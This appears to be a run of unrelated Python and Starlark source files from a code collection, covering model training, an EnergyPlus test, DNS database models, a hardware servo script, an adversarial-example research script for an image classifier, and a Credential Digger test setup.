self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_1_heat_exchanger_effectiveness, var_method_1_heat_exchanger_effectiveness)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_2_parameter_hxs0, var_method_2_parameter_hxs0)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_2_parameter_hxs1, var_method_2_parameter_hxs1)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_2_parameter_hxs2, var_method_2_parameter_hxs2)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_2_parameter_hxs3, var_method_2_parameter_hxs3)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_2_parameter_hxs4, var_method_2_parameter_hxs4)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_3_h0gas_coefficient, var_method_3_h0gas_coefficient)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_3_ndotgasref_coefficient, var_method_3_ndotgasref_coefficient)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_3_n_coefficient, var_method_3_n_coefficient)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_3_gas_area, var_method_3_gas_area)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_3_h0_water_coefficient, var_method_3_h0_water_coefficient)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_3_n_dot_water_ref_coefficient, var_method_3_n_dot_water_ref_coefficient)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_3_m_coefficient, var_method_3_m_coefficient)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_3_water_area, var_method_3_water_area)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_3_f_adjustment_factor, var_method_3_f_adjustment_factor)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_4_hxl1_coefficient, var_method_4_hxl1_coefficient)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_4_hxl2_coefficient, var_method_4_hxl2_coefficient)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_4_condensation_threshold, var_method_4_condensation_threshold)
|
11556177
|
from __future__ import print_function
import configargparse
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.backends.cudnn as cudnn
import torchnet as tnt
from torchnet.engine import Engine
from torchnet.logger import VisdomPlotLogger, VisdomLogger
from tqdm import tqdm
from models import DenseNet
from datasets import ImageNet, CIFAR10, CIFAR100
import os
import copy
import math
import random
import numpy as np
parser = configargparse.ArgParser(default_config_files=[])
parser.add('--config', required=True, is_config_file=True, help='config file path')
parser.add('--batch-size', type=int, default=256, metavar='N',
help='input batch size for training (default: 256)')
parser.add('--num-batch-splits', type=int, default=1, metavar='split',
help='split batch size for training (default: 1)')
parser.add('--dataset', type=str, required=True, metavar='dataset',
help="dataset name: ImageNet | CIFAR10 | CIFAR100 (default: '')")
parser.add('--data', type=str, default='datasets', metavar='data_root_path',
help="data root: /path/to/dataset (default: 'datasets')")
parser.add('--test-batch-size', type=int, default=1024, metavar='N',
help='input batch size for testing (default: 1024)')
parser.add('--bn-size', default=None, type=int,
metavar='bn_size', help='bottleneck size')
parser.add('--num-init-features', type=int, default=None,
metavar='num_init_features', help='num_init_features')
parser.add('--compression', type=float, default=1.,
metavar='compression', help='compression at transition')
parser.add('--block-config', type=int, default=None, nargs='+', metavar='model_config',
help='model block config')
parser.add('--epochs', type=int, default=90, metavar='N',
help='number of epochs to train (default: 90)')
parser.add('--lr', type=float, default=0.1, metavar='LR',
help='learning rate (default: 0.1)')
parser.add('--lr-type', default='multistep', type=str, metavar='T',
help='learning rate strategy (default: multistep)',
choices=['multistep', 'cosine', 'triangle'])
parser.add('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
parser.add('--clip', type=float, default=4,
help='gradient clipping')
parser.add('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
parser.add('--gpus', type=int, default=None, nargs='*', metavar='--gpus 0 1 2 ...',
help='gpu ids for CUDA training')
parser.add('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add('--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add('--start-epoch', default=0, type=int, metavar='N',
help='manual epoch number (useful on restarts)')
parser.add('--checkpoints', default='checkpoints', type=str, metavar='checkpoints',
help='checkpoints path')
parser.add('--test-only', action='store_true', default=False,
help='only test model')
parser.add('--visdom', action='store_true', default=False,
help='visualize the process')
parser.add('--log-name', type=str, default='', metavar='LOG_NAME',
help='log name for clarifying')
parser.add('--save-interval', type=int, default=5,
metavar='model_checkpoint_interval', help='model checkpoint save interval')
args = parser.parse_args()
if not args.gpus or (len(args.gpus) > 0 and (args.gpus[0] < 0 or not torch.cuda.is_available())):
args.gpus = []
torch.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed + 1)
random.seed(args.seed + 2)
np.random.seed(args.seed + 3)
kwargs = {'num_workers': 20, 'pin_memory': True} if len(args.gpus) > 0 else {}
train_transform = test_transform = None
if 'CIFAR' in args.dataset:
from torchvision import transforms
if args.dataset == 'CIFAR10':
mean = [125.3 / 255, 123.0 / 255, 113.9 / 255]
std = [63.0 / 255, 62.1 / 255, 66.7 / 255]
else:
mean = [129.3 / 255, 124.1 / 255, 112.4 / 255]
std = [68.2 / 255, 65.4 / 255, 70.4 / 255]
train_transform = transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.Pad(padding=4),
transforms.RandomCrop(32),
transforms.ToTensor(),
transforms.Normalize(mean, std)
])
test_transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(mean, std)
])
train_loader = torch.utils.data.DataLoader(
globals()[args.dataset](root=args.data, transform=train_transform, train=True),
batch_size=args.batch_size, shuffle=True, drop_last=True, worker_init_fn=None, **kwargs)
test_loader = torch.utils.data.DataLoader(
globals()[args.dataset](root=args.data, transform=test_transform, train=False),
batch_size=args.test_batch_size, shuffle=False, **kwargs)
num_classes = {"CIFAR10": 10, "CIFAR100": 100, "ImageNet": 1000}
input_size = args.dataset == 'ImageNet' and 224 or 32
model = DenseNet(num_init_features=args.num_init_features, block_config=args.block_config, compression=args.compression,
input_size=input_size, bn_size=args.bn_size, num_classes=num_classes[args.dataset], efficient=True)
print(model)
if not os.path.isdir(args.checkpoints):
os.mkdir(args.checkpoints)
# optionally resume from a checkpoint
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
if 'epoch' in checkpoint:
args.start_epoch = checkpoint['epoch'] + 1
state_dict = checkpoint['state_dict']
else:
state_dict = checkpoint
model.load_state_dict(state_dict=state_dict, strict=False)
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, args.start_epoch - 1))
else:
print("=> no checkpoint found at '{}'".format(args.resume))
print(args)
if len(args.gpus) > 0:
model.cuda()
cudnn.benchmark = True
if len(args.gpus) > 1:
model = nn.DataParallel(model, device_ids=args.gpus).cuda()
engine = Engine()
meter_loss = tnt.meter.AverageValueMeter()
topk = [1, 5]
classerr = tnt.meter.ClassErrorMeter(topk=topk, accuracy=False) # default is also False
confusion_meter = tnt.meter.ConfusionMeter(num_classes[args.dataset], normalized=True)
if args.visdom:
if args.log_name == '':
args.log_name = args.dataset  # the parser defines no 'build_type' option; fall back to the dataset name
train_loss_logger = VisdomPlotLogger('line', opts={'title': '[{}] Train Loss'.format(args.log_name)})
train_err_logger = VisdomPlotLogger('line', opts={'title': '[{}] Train Class Error'.format(args.log_name)})
test_loss_logger = VisdomPlotLogger('line', opts={'title': '[{}] Test Loss'.format(args.log_name)})
test_err_logger = VisdomPlotLogger('line', opts={'title': '[{}] Test Class Error'.format(args.log_name)})
confusion_logger = VisdomLogger('heatmap', opts={'title': '[{}] Confusion matrix'.format(args.log_name),
'columnnames': list(range(num_classes[args.dataset])),
'rownames': list(range(num_classes[args.dataset]))})
criterion = nn.CrossEntropyLoss()
def network(sample):
if sample[2]: # train mode
model.train()
else:
model.eval()
inputs, targets = sample[0], sample[1]
if len(args.gpus) > 0:
inputs, targets = inputs.cuda(), targets.cuda()
with torch.set_grad_enabled(sample[2]):
outputs = model(inputs)
loss = criterion(outputs, targets)
return loss, outputs
def network_split_batch(sample):
outputs = Variable()
if len(args.gpus) > 0:
outputs = outputs.cuda()
if args.num_batch_splits >= len(sample[1]):
return network((sample[0], sample[1], sample[2]))
d = (len(sample[1]) + args.num_batch_splits - 1) // args.num_batch_splits
for i in range(args.num_batch_splits):
start = i * d
end = min((i + 1) * d, len(sample[1]))
with torch.set_grad_enabled(sample[2]):
loss, split_outputs = network((sample[0][start:end], sample[1][start:end], sample[2]))
if sample[2] and i < args.num_batch_splits - 1:
loss.backward()
outputs = torch.cat([outputs, split_outputs], dim=0) if len(outputs) > 0 else split_outputs
return loss, outputs
network_forward = network if args.num_batch_splits == 1 else network_split_batch
def on_start(state):
state['epoch'] = args.start_epoch
state['t'] = args.start_epoch * len(state['iterator'])
def on_sample(state):
state['sample'].append(state['train']) # sample[2] is mode
if state['train']:
T_total = state['maxepoch'] * len(state['iterator'])
if args.lr_type == 'multistep':
lr_decay = state['epoch'] // 30
lr = args.lr * 0.1 ** lr_decay
elif args.lr_type == 'cosine':
num_cycles = 4
cycle_len = T_total / num_cycles
lr = 0.5 * args.lr * (1 + math.cos(math.pi * (state['t'] % cycle_len) / cycle_len))
elif args.lr_type == 'triangle':
num_cycles = 4
min_lr = min(1e-3, args.lr)
max_lr = args.lr
cycle_len = int(T_total * 0.9) // num_cycles
if state['t'] < cycle_len * num_cycles:
p = state['t'] % cycle_len
if p < cycle_len / 2:
lr = min_lr + (max_lr - min_lr) * p * 2 / cycle_len
else:
lr = max_lr - (max_lr - min_lr) * (p - cycle_len / 2) * 2 / cycle_len
else:
lr = min_lr * (T_total - state['t']) / (T_total - cycle_len * num_cycles)
# change lr
for group in state['optimizer'].param_groups:
group['lr'] = lr
if state['t'] == state['epoch'] * len(state['iterator']):
for i, p in enumerate(state['optimizer'].param_groups):
print(str(i) + ':', p['lr'])
def reset_meters():
classerr.reset()
meter_loss.reset()
confusion_meter.reset()
def on_start_epoch(state):
reset_meters()
state['iterator'] = tqdm(state['iterator'])
def on_forward(state):
if state['sample'][2]:
nn.utils.clip_grad_norm_(model.parameters(), args.clip)
classerr.add(state['output'].data, state['sample'][1])
confusion_meter.add(state['output'].data, state['sample'][1])
meter_loss.add(state['loss'].item())
def on_end_epoch(state):
# state['epoch'] += 1 is before this function
print('[Epoch {:03d}] Training loss: {:.4f}\tTop 1: {:.2f}\tTop 5: {:.2f}'.format(
state['epoch'] - 1, meter_loss.value()[0], classerr.value(k=1), classerr.value(k=5)))
if args.visdom:
train_loss_logger.log(state['epoch'] - 1, meter_loss.value()[0])
train_err_logger.log(state['epoch'] - 1, classerr.value(k=1))
if state['epoch'] % args.save_interval == 0:
saved_model = model.module if len(args.gpus) > 1 else model
copied_model = copy.deepcopy(saved_model).cpu()
torch.save(obj={'epoch': state['epoch'] - 1, 'state_dict': copied_model.state_dict()},
f=os.path.join(args.checkpoints, args.dataset + '_{:03d}.tar'.format(state['epoch'] - 1)))
# do validation at the end of each epoch
reset_meters()
engine.test(network=network_forward, iterator=test_loader)
if args.visdom:
test_loss_logger.log(state['epoch'] - 1, meter_loss.value()[0])
test_err_logger.log(state['epoch'] - 1, classerr.value()[0])
confusion_logger.log(confusion_meter.value())
print('[Epoch {:03d}] Test loss: {:.4f}\tTop 1: {:.2f}\tTop 5: {:.2f}'.format(
state['epoch'] - 1, meter_loss.value()[0], classerr.value(k=1), classerr.value(k=5)))
if args.test_only:
engine.hooks['on_sample'] = on_sample
engine.hooks['on_forward'] = on_forward
engine.test(network=network_forward, iterator=test_loader)
print('Test loss: {:.4f}\tTop 1: {:.2f}\tTop 5: {:.2f}'.format(
meter_loss.value()[0], classerr.value(k=1), classerr.value(k=5)))
else:
optimizer = torch.optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum,
weight_decay=args.weight_decay, nesterov=True)
engine.hooks['on_start'] = on_start
engine.hooks['on_sample'] = on_sample
engine.hooks['on_forward'] = on_forward
engine.hooks['on_start_epoch'] = on_start_epoch
engine.hooks['on_end_epoch'] = on_end_epoch
engine.train(network=network_forward, iterator=train_loader, maxepoch=args.epochs, optimizer=optimizer)
|
11556212
|
from struct import *
import sys
import io
import os
if len(sys.argv) != 4:
print("Usage: {} [pack/unpack] [input] [output]".format(sys.argv[0]))
sys.exit(1)
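# Record layout (little-endian): uint16 target dialog id, uint16 window message,
# uint32 string length (including the null terminator), then a cp932-encoded
# string followed by a single null byte. A target dialog id of 0 terminates the file.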
if sys.argv[1] == "unpack":
with io.open(sys.argv[2], "rb") as input_file:
with io.open(sys.argv[3], "w", encoding="utf-8") as output_file:
print("Unpacking {} to {}...".format(os.path.basename(sys.argv[2]), os.path.basename(sys.argv[3])))
while True:
target_dlg = unpack("<H", input_file.read(2))[0]
if target_dlg == 0:
print("Done.")
break
print(target_dlg, file=output_file)
print(unpack("<H", input_file.read(2))[0], file=output_file)
# need to do length - 1 to not copy null terminator
print(input_file.read(unpack("<I", input_file.read(4))[0] - 1).decode("cp932"), file=output_file)
input_file.read(1)
elif sys.argv[1] == "pack":
with io.open(sys.argv[2], "r", encoding="utf-8") as input_file:
with io.open(sys.argv[3], "wb") as output_file:
print("Packing {} to {}...".format(os.path.basename(sys.argv[2]), os.path.basename(sys.argv[3])))
input_arr = input_file.read().splitlines()
for x in range(int(len(input_arr) / 3)): # expected to be divisible by 3
idx = x * 3
sjis_str = input_arr[idx + 2].encode("cp932")
output_file.write(pack("<H", int(input_arr[idx]))) # target dlg
output_file.write(pack("<H", int(input_arr[idx + 1]))) # window msg
output_file.write(pack("<I", len(sjis_str) + 1)) # string len
output_file.write(sjis_str) # string
output_file.write(b"\x00")
output_file.write(b"\x00\x00") # terminator
print("Done.")
else:
print("invalid operation!")
|
11556279
|
from pybtex.database import Entry
def cleanup_string(string):
return string.replace('{', '').replace('}', '').replace('\\', '')
def recurse_bibtex(obj, entries):
for b in obj.__class__.__bases__:
if issubclass(b, Citable):
entries.extend(b.BIBTEX_ENTRIES)
recurse_bibtex(b, entries)
def stringify_people(authors):
return ', '.join([cleanup_string(str(p)) for p in authors])
def unique_citations_only(citations):
current_citations = []
for c in citations:
if c not in current_citations:
current_citations.append(c)
return current_citations
def to_bibtex(citations):
import uuid
from pybtex.database import BibliographyData
entries = {str(uuid.uuid4())[:8]: b for b in citations}
bib_data = BibliographyData(entries=entries)
return bib_data.to_string('bibtex')
def handle_publication(fields):
journal = []
if 'journal' in fields:
journal.append(cleanup_string(fields['journal']))
elif 'booktitle' in fields:
journal.append(cleanup_string(fields['booktitle']))
elif 'archivePrefix' in fields:
journal.append(cleanup_string(fields['archivePrefix']))
if 'volume' in fields:
journal.append(cleanup_string(fields['volume']))
elif 'eprint' in fields:
journal.append(cleanup_string(fields['eprint']))
if 'pages' in fields:
journal.append(cleanup_string(fields['pages']))
if 'month' in fields:
journal.append(cleanup_string(fields['month']))
if 'year' in fields:
journal.append(cleanup_string(fields['year']))
return ', '.join(journal)
def construct_nice_printable_string(entry, indent=0):
mystring = ''
indent = ''.join(['\t']*indent)
form = f'{indent}%s\n'
if 'title' in entry.fields:
mystring += form % cleanup_string(entry.fields['title'])
people = entry.persons
if 'author' in people:
mystring += form % stringify_people(people['author'])
mystring += form % handle_publication(entry.fields)
return mystring
class Citable:
    """
    Defines a class that contains citation
    information.
    """
    BIBTEX_ENTRIES = []
    """
    List of bibtex entries
    """
    def citations(self):
        entries = self.BIBTEX_ENTRIES[:]
        recurse_bibtex(self, entries)
        all_citations = [Entry.from_string(b, 'bibtex')
                         for b in entries]
        return unique_citations_only(all_citations)

    def nice_citation(self, prefix='', start_idx=0, indent=0):
        entries = self.citations()
        if len(entries) == 0:
            return ''
        return '\n'.join([construct_nice_printable_string(e, indent)
                          for e in entries])
|
11556287
|
JarsToLabelsInfo = provider(fields = [
"jars_to_labels", # dict of path of a jar to a label
])
|
11556332
|
from typing import List

class Solution:
    def minPatches(self, nums: List[int], n: int) -> int:
        # 'add' is the smallest sum not yet reachable with the numbers taken so far
        add, i, count = 1, 0, 0
        while add <= n:
            if i < len(nums) and nums[i] <= add:
                # nums[i] extends the reachable range [1, add - 1] to [1, add + nums[i] - 1]
                add += nums[i]
                i += 1
            else:
                # patch with 'add' itself, doubling the reachable range
                add += add
                count += 1
        return count

s = Solution()
print(s.minPatches([1, 2, 3, 8], 80))  # expected: 3
|
11556338
|
from ..plugins import create_groupnorm_plugin
from ..torch2trt_dynamic import tensorrt_converter, trt_
@tensorrt_converter('torch.nn.GroupNorm.forward')
def convert_GroupNorm(ctx):
module = ctx.method_args[0]
input = ctx.method_args[1]
input_trt = trt_(ctx.network, input)
weight_trt = trt_(ctx.network, module.weight)
bias_trt = trt_(ctx.network, module.bias)
output = ctx.method_return
num_groups = module.num_groups
eps = module.eps
plugin = create_groupnorm_plugin(
'groupnorm_' + str(id(module)), num_groups=num_groups, eps=eps)
custom_layer = ctx.network.add_plugin_v2(
inputs=[input_trt, weight_trt, bias_trt], plugin=plugin)
output._trt = custom_layer.get_output(0)
|
11556339
|
from setuptools import setup
from setuptools_rust import Binding, RustExtension
import os
setup(name='granne',
version='0.5.2',
rust_extensions=[RustExtension('granne',
'py/Cargo.toml', binding=Binding.RustCPython)],
zip_safe=False,
setup_requires=['setuptools_scm']
)
|
11556354
|
import logging
import pytorch_lightning as pl
from torch import nn
from transformers import AutoConfig, AutoModel, AutoTokenizer
logger = logging.getLogger(__name__)
class PretrainedTransformer(pl.LightningModule):
def __init__(self, args, num_labels=None, mode="base", **config_kwargs):
"Initialize a model."
super().__init__()
self.args = args
cache_dir=self.args.cache_dir if self.args.cache_dir else None
self.config = AutoConfig.from_pretrained(
self.args.config_name if self.args.config_name else self.args.model_name_or_path,
**({"num_labels": num_labels} if num_labels is not None else {}),
cache_dir=cache_dir,
**config_kwargs,
)
self.tokenizer = AutoTokenizer.from_pretrained(
self.args.tokenizer_name if self.args.tokenizer_name else self.args.model_name_or_path,
cache_dir=cache_dir,
use_fast=True,
)
self.model = AutoModel.from_pretrained(
self.args.model_name_or_path,
from_tf=bool(".ckpt" in self.args.model_name_or_path),
config=self.config,
cache_dir=cache_dir,
)
def forward(self, **inputs):
return self.model(**inputs)
@staticmethod
def add_model_specific_args(parser, root_dir):
parser.add_argument(
"--model_name_or_path",
default=None,
type=str,
required=True,
help="Path to pretrained model or model identifier from huggingface.co/models",
)
parser.add_argument(
"--config_name", default="", type=str, help="Pretrained config name or path if not the same as model_name"
)
parser.add_argument(
"--tokenizer_name",
default="",
type=str,
help="Pretrained tokenizer name or path if not the same as model_name",
)
parser.add_argument(
"--cache_dir",
default="",
type=str,
help="Where do you want to store the pre-trained models downloaded from s3",
)
parser.add_argument("--learning_rate", default=5e-4, type=float, help="The initial learning rate for Adam for the non-transformer parameters.")
parser.add_argument("--weight_decay", default=0.0, type=float, help="Weight decay if we apply some.")
parser.add_argument("--adam_epsilon", default=1e-8, type=float, help="Epsilon for Adam optimizer.")
parser.add_argument("--warmup_ratio", default=0, type=float, help="The fraction of steps to warm up.")
parser.add_argument(
"--num_train_epochs", default=3, type=int, help="Total number of training epochs to perform."
)
parser.add_argument("--train_batch_size", default=32, type=int)
parser.add_argument("--eval_batch_size", default=32, type=int)
|
11556368
|
import RPi.GPIO as GPIO
import time
import Adafruit_ADS1x15
adc = Adafruit_ADS1x15.ADS1115()
GAIN = 1
adc.start_adc(0, gain=GAIN)
GPIO.setmode(GPIO.BCM)
GPIO.setup(14,GPIO.OUT)
GPIO.setwarnings(False)
servo = GPIO.PWM(14, 50)
servo.start(0)
def Distance():
    D_value = adc.get_last_result()
    D = (1.0 / (D_value / 13.15)) - 0.35
    return D

j = 12.5
k = 2.5
i = 0
distLR = []
distRL = []
while True:
    # sweep the servo one way, sampling the distance at each step
    while k <= 12.5:
        servo.ChangeDutyCycle(k)
        time.sleep(.1)
        distLR.insert(i, Distance())
        k = k + 2.5
        i = i + 1
    print distLR
    i = 0
    k = 0
    del distLR[:]
    # sweep back the other way
    while j >= 2.5:
        servo.ChangeDutyCycle(j)
        time.sleep(.1)
        j = j - 2.5
        distRL.insert(i, Distance())
        i = i + 1
    print distRL
    i = 0
    k = 2.5
    j = 12.5
    del distRL[:]
|
11556370
|
from app import db
class DNSZoneModel(db.Model):
__tablename__ = 'dns_zones'
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, nullable=True, index=True, default=0)
domain = db.Column(db.String(255), nullable=True, default='', index=True)
active = db.Column(db.Boolean, default=True, index=True)
catch_all = db.Column(db.Boolean, default=True, index=True)
master = db.Column(db.Boolean, default=False, index=True)
forwarding = db.Column(db.Boolean, default=False, index=True)
regex = db.Column(db.Boolean, default=False, index=True)
# Required in all models.
created_at = db.Column(db.DateTime, nullable=True)
updated_at = db.Column(db.DateTime, nullable=True)
class DNSRecordModel(db.Model):
__tablename__ = 'dns_records'
id = db.Column(db.Integer, primary_key=True)
dns_zone_id = db.Column(db.Integer, nullable=True, index=True, default=0)
ttl = db.Column(db.Integer, nullable=True, default=0)
cls = db.Column(db.String(32), nullable=True, default='', index=True)
type = db.Column(db.String(32), nullable=True, default='', index=True)
data = db.Column(db.Text, nullable=True)
active = db.Column(db.Boolean, default=True, index=True)
has_conditional_responses = db.Column(db.Boolean, default=False, index=True)
conditional_data = db.Column(db.Text, nullable=True)
conditional_count = db.Column(db.Integer, nullable=True, default=0)
conditional_limit = db.Column(db.Integer, nullable=True, default=0)
conditional_reset = db.Column(db.Boolean, default=False, index=True)
# Required in all models.
created_at = db.Column(db.DateTime, nullable=True)
updated_at = db.Column(db.DateTime, nullable=True)
class DNSQueryLogModel(db.Model):
__tablename__ = 'dns_query_log'
id = db.Column(db.Integer, primary_key=True)
source_ip = db.Column(db.String(128), nullable=True, default='', index=True)
domain = db.Column(db.String(255), nullable=True, default='', index=True)
cls = db.Column(db.String(32), nullable=True, default='')
type = db.Column(db.String(32), nullable=True, default='', index=True)
data = db.Column(db.Text, nullable=True)
found = db.Column(db.Boolean, default=False, index=True)
forwarded = db.Column(db.Boolean, default=False, index=True)
blocked = db.Column(db.Boolean, default=False, index=True)
completed = db.Column(db.Boolean, default=False, index=True)
dns_zone_id = db.Column(db.Integer, nullable=True, default=0, index=True)
dns_record_id = db.Column(db.Integer, nullable=True, default=0, index=True)
# Required in all models.
created_at = db.Column(db.DateTime, nullable=True)
updated_at = db.Column(db.DateTime, nullable=True)
class DNSZoneRestrictionModel(db.Model):
__tablename__ = 'dns_zone_restrictions'
id = db.Column(db.Integer, primary_key=True)
zone_id = db.Column(db.Integer, nullable=True, default=0, index=True)
ip_range = db.Column(db.String(255), nullable=True, default='', index=True)
type = db.Column(db.Integer, nullable=True, default=0, index=True)
enabled = db.Column(db.Boolean, default=False, index=True)
# Required in all models.
created_at = db.Column(db.DateTime, nullable=True)
updated_at = db.Column(db.DateTime, nullable=True)
class DNSZoneTagModel(db.Model):
__tablename__ = 'dns_zone_tags'
id = db.Column(db.Integer, primary_key=True)
dns_zone_id = db.Column(db.Integer, nullable=True, index=True, default=0)
tag_id = db.Column(db.Integer, nullable=True, index=True, default=0)
# Required in all models.
created_at = db.Column(db.DateTime, nullable=True)
updated_at = db.Column(db.DateTime, nullable=True)
|
11556384
|
import time
import os
import platform
import sys
if platform.system() == 'Darwin':
print 'Skipped for Mac platform'
sys.exit(0)
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from nw_util import *
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
chrome_options = Options()
chrome_options.add_argument("nwapp=" + os.path.dirname(os.path.abspath(__file__)))
driver = webdriver.Chrome(executable_path=os.environ['CHROMEDRIVER'], chrome_options=chrome_options)
driver.implicitly_wait(2)
try:
    print(driver.current_url)
    res = wait_for_element_id_content(driver, "result", "URL is: null")
    print(res)
    assert("URL is: null" in res)
    print("There is no crash")
finally:
driver.quit()
|
11556411
|
import os
import copy
import shutil
import attacks
import foolbox
import numpy as np
from fmodel import create_fmodel
from bmodel import create_bmodel
from utils import read_images, store_adversarial, compute_MAD
test_model_acc = False
def run_attack_curls_whey(model, image, label):
criterion = foolbox.criteria.Misclassification()
attack = attacks.curls_untargeted(model, criterion)
perturbed_image = attack(image, label, scale=1, iterations=5, binary_search=12,
return_early=True, epsilon=0.3, bb_step=3, RO=True,
m=1, RC=True, TAP=False, uniform_or_not=False, moment_or_not=False)
if perturbed_image is None: return None
    noise = perturbed_image - image
    # Greedy refinement: for each magnitude from 255 down to 1, try halving the
    # noise entries with that exact value (positive, then negative) and keep
    # the change only if the image remains misclassified.
    for i in range(255, 0, -1):
noise_temp = copy.deepcopy(noise)
noise_temp[(noise_temp == i)] //= 2
if (noise != noise_temp).any():
if np.argmax(model.predictions(noise_temp + image)) != label:
noise = copy.deepcopy(noise_temp)
noise_temp = copy.deepcopy(noise)
noise_temp[(noise_temp == -i)] //= 2
if (noise != noise_temp).any():
if np.argmax(model.predictions(noise_temp + image)) != label:
noise = copy.deepcopy(noise_temp)
perturbed_image = noise + image
return perturbed_image
def test(model, attack_func, method_name):
if os.path.exists("results"):
shutil.rmtree("results")
os.mkdir("results");
acc = 0
for (file_name, image, label) in read_images():
        if test_model_acc:
acc += np.argmax(model.predictions(image)) == label
continue
print(file_name, end="\t\t")
adversarial = attack_func(model, image, label)
store_adversarial(file_name, adversarial)
if adversarial is None:
print("can't find")
elif np.argmax(model.predictions(adversarial)) != label:
print("l2: %.4f" %np.linalg.norm(image/255 - adversarial/255))
        else:
            print("error")
            exit()
    if test_model_acc:
        print("model accuracy: %.4f" % (acc / 200))
        exit()
print("\n", method_name, "\n")
compute_MAD()
def main():
forward_model = create_fmodel()
backward_model = create_bmodel()
model = foolbox.models.CompositeModel(
forward_model=forward_model,
backward_model=backward_model)
print("\n\nStart Test...")
test(model, run_attack_curls_whey, "Curls & Whey")
if __name__ == '__main__':
main()
|
11556434
|
import torch.utils.data as data
from PIL import ImageFile
from dataset.Parsers.MOT17 import GTParser_MOT_17
from dataset.Parsers.JTA import GTParser_JTA
from dataset.augmentation import SSJAugmentation
ImageFile.LOAD_TRUNCATED_IMAGES = True
class MOT17JTATrainDataset(data.Dataset):
'''
    Training dataset that reads the gt.txt files and rearranges them into sets of tracks.
    Samples can be selected starting from a specified frame.
'''
def __init__(self,
mot17_root,
mot15_root,
jta_root,
epoch,
arg,
transform=SSJAugmentation,
):
# 1. init all the variables
self.mot17_root = mot17_root
self.mot15_root = mot15_root
self.jta_root = jta_root
self.transform = transform(size=arg.img_size, type='train')
self.epoch = epoch
self.parsers = {}
# 2. init GTParser
self.parser_MOT17 = GTParser_MOT_17(self.mot17_root, 'train', forward_frames=arg.forward_frames,
frame_stride=arg.frame_stride, min_vis=arg.min_visibility,
value_range=arg.value_range)
self.parsers['MOT17'] = self.parser_MOT17
self.parser_JTA = GTParser_JTA(self.jta_root, 'train', forward_frames=arg.forward_frames,
frame_stride=arg.frame_stride, min_vis=0.3,
value_range=arg.value_range)
self.parsers['JTA'] = self.parser_JTA
def __getitem__(self, item):
        mot17 = item < len(self.parser_MOT17) * self.epoch
        if mot17:
            parser = self.parsers['MOT17']
            item = item % len(self.parser_MOT17)
        else:
            parser = self.parsers['JTA']
            item = (item - len(self.parser_MOT17) * self.epoch) % len(self.parser_JTA)
image, img_meta, tubes, labels, start_frame = parser[item]
while image is None:
print('None processing.')
item += 100
image, img_meta, tubes, labels, start_frame = parser[item % len(parser)]
if self.transform is None:
return image, img_meta, tubes, labels, start_frame
else:
image, img_meta, tubes, labels, start_frame = self.transform(image, img_meta, tubes, labels, start_frame)
return image, img_meta, tubes, labels, start_frame
def __len__(self):
return len(self.parser_MOT17) * self.epoch * 2
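# Hypothetical usage sketch (not part of the original file): wiring the dataset
# into a torch DataLoader. The root paths and the `arg` namespace are
# placeholders; real values come from the project's argument parser.
# from torch.utils.data import DataLoader
# dataset = MOT17JTATrainDataset(mot17_root='data/MOT17', mot15_root='data/MOT15',
#                                jta_root='data/JTA', epoch=10, arg=arg)
# loader = DataLoader(dataset, batch_size=4, shuffle=True, num_workers=2)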
|
11556435
|
import os
import tempfile
import unittest
import pandas as pd
from credentialdigger.cli import cli
from credentialdigger.client_sqlite import SqliteClient
from parameterized import param, parameterized
class TestGetDiscoveries(unittest.TestCase):
@classmethod
def setUpClass(cls):
""" Set up a database and insert fake discoveries into it for testing
purposes.
"""
# Set up sqlite database and CSV export temporary paths
cls.tmp_path = tempfile.mkdtemp()
cls.db_path = os.path.join(cls.tmp_path, 'test_db.sqlite')
cls.csv_path = os.path.join(cls.tmp_path, 'test.csv')
# Set up sqlite database
client = SqliteClient(cls.db_path)
client.add_rules_from_file('tests/functional_tests/test_rules.yml')
client.add_repo('test_repo')
# Insert fake discoveries
discoveries = []
discoveries_count = 5
for state in ['new', 'false_positive', 'addressing',
'not_relevant', 'fixed']:
for i in range(discoveries_count):
discovery = {
'file_name': 'danger' if state == 'new' else 'fake_file',
'commit_id': '0xtmp_commit_id',
'line_number': '1',
'snippet': 'tmp_snippet',
'rule_id': 1,
'state': state,
'timestamp': '2021-08-05T01:13',
}
discoveries.append(discovery)
